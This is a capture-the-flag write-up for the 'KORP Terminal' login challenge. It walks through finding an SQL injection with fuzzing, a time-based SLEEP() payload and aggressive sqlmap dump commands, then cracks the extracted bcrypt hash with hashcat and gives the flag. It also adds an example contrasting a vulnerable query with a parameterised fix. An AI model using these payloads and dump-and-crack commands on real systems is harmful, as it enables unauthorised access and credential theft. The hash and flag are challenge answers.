KORP Terminal
Personal Rating: Medium
Last updated
The website shows this terminal:
The username and password are sent in a POST request, which you can see by inspecting the source code.
Interestingly, clicking on either of the two buttons generates the exact same web request.
Now we know that the server uses Python Werkzeug in the background.
I tested sqlmap against the request with the POST, GET and OPTIONS methods, which did not work.
During an active scan with ZAProxy, one request returned an error. The request has this body: username=c%3A%5C&password=test2
This is the error:
This indicates that an SQL injection might be possible.
With that knowledge I started sqlmap again and tweaked it accordingly in the hope of finding a simple injection. I did not bother being stealthy:
sqlmap -r '/HTBfolder/CTF-2024-HTB/KORP Terminal/KORPTerminal.req' --dbms mariadb --level 5 --risk 3 -a
This did not work.
Running a Burp fuzz, I found some characters that provoke an internal server error:
This payload:
username=admin+OR+1==1')&password=test
returns an interesting error, which might indicate that we bypassed some input sanitization:
This command worked to dump the admin hash:
sqlmap --dbms mariadb --level 5 --risk 3 -r request.txt --ignore-code='*' -D korp_terminal -a
This payload works manually in the username field:
' AND (SELECT 1234 FROM (SELECT(SLEEP(10)))asd)-- we
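The two observations above (the `admin OR 1==1')` payload breaking the query, and the time-based payload in the username field) both come from the username being spliced straight into the SQL statement. The following is an added example, not code from the challenge: a constructed login check in the vulnerable style beside its parameterised fix, using an in-memory SQLite table and a sha256 stand-in for the real bcrypt hash so it runs offline. The table, column names and sample password are assumptions.

```python
import hashlib
import hmac
import sqlite3


def make_db():
    # Constructed stand-in for the login table. The real target ran MariaDB
    # and stored bcrypt ($2b$) hashes; sha256 is used here only to stay
    # dependency-free. Sample credentials are invented.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.sha256(b"correct-horse").hexdigest()))
    conn.commit()
    return conn


def verify(stored_hash, candidate):
    # Constant-time comparison of the stored hash against the candidate's hash.
    return hmac.compare_digest(stored_hash, hashlib.sha256(candidate.encode()).hexdigest())


def login_vulnerable(conn, username, password):
    # The username is formatted into the statement, so quotes and parentheses
    # in it change the query's structure. This is the pattern behind the
    # syntax error seen above and behind the SLEEP()-based extraction.
    sql = f"SELECT password FROM users WHERE (username='{username}')"
    row = conn.execute(sql).fetchone()
    return row is not None and verify(row[0], password)


def login_safe(conn, username, password):
    # Parameterised query: the driver passes the value separately from the
    # statement, so the whole input is data and cannot alter the WHERE clause.
    sql = "SELECT password FROM users WHERE (username=?)"
    row = conn.execute(sql, (username,)).fetchone()
    return row is not None and verify(row[0], password)


if __name__ == "__main__":
    db = make_db()
    payload = "admin OR 1==1')"  # the payload from the write-up above
    try:
        login_vulnerable(db, payload, "test")
    except sqlite3.OperationalError as err:
        print("vulnerable query broke:", err)
    print("safe query with payload:", login_safe(db, payload, "test"))
    print("safe query with real creds:", login_safe(db, "admin", "correct-horse"))
```

With the fix in place the same payload simply matches no user, and a request that previously caused a 500 now gets an ordinary failed-login response.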
$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.
hashcat -a 0 -m 3200 '$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.' /usr/share/seclists/Passwords/rockyou.txt
HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}